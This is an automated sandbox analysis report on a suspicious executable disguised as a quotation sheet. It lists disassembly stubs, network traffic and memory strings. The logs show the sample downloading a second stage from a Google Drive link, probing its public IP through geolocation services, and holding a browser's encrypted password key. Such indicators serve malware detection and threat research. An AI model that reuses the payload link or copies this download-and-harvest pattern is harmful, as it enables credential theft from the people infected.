            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B999D7h131_2_37B99730
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]131_2_37B95F18
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B9AFB7h131_2_37B9AD10
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]131_2_37B95F15
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B925A7h131_2_37B92300
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B9841Fh131_2_37B98178
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B929FFh131_2_37B92758
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B90FEFh131_2_37B90D48
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B93B5Fh131_2_37B938B8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B9AB5Fh131_2_37B9A8B8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B9214Fh131_2_37B91EA8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B9073Fh131_2_37B90498
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B99127h131_2_37B98E80
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B97F9Fh131_2_37B97CF8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B90B97h131_2_37B908F0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B9957Fh131_2_37B992D8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B98CCFh131_2_37B98A28
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B9A2AFh131_2_37B9A008
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B932AFh131_2_37B93008
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B9A707h131_2_37B9A460
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B93707h131_2_37B93460
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B91CF7h131_2_37B91A50
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B902E7h131_2_37B90040
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
            Source: Joe Sandbox ViewIP Address: 172.67.177.134 172.67.177.134
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034F59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}},"fre":{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"},"hardware_acceleration_mode_previous":true,"is_dsp_recommended":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false},"network_primary_browser":{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}},"network_time":{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="},"policy":{"last_statistics_update":"13335737596278882"},"profile":{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20",
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D69000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034DBB000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E42000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E0A000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E15000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E37000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E2C000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004438000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034DBB000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E42000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E0A000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E15000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E37000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E2C000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.00000000044CA000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38288900779.00000000044C9000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.00000000044CA000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38288900779.00000000044C9000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: z1QuotationSheetVSAA6656776.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: z1QuotationSheetVSAA6656776.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.00000000044CA000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38288900779.00000000044C9000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917798214.0000000006260000.00000004.00001000.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004475000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/z
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38288900779.00000000044C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38288900779.00000000044C9000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC&export=download
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC&export=download5
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EA7000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EB2000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EA7000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42929228162.0000000035D43000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EA7000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42929228162.0000000035D43000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/lB
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EA7000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42929228162.0000000035D43000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.00000000044CA000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38288900779.00000000044C9000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034DBB000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E42000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E0A000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E15000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E37000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E2C000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/149.18.24.104
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034DBB000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E42000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E0A000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E15000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E37000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/149.18.24.104$
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownHTTPS traffic detected: 142.251.167.113:443 -> 192.168.11.20:49779 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.111.132:443 -> 192.168.11.20:49780 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.11.20:49782 version: TLS 1.2
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 0_2_004051BA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004051BA
            Source: Conhost.exeProcess created: 96

            System Summary

            barindex
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: z1QuotationSheetVSAA6656776.exe
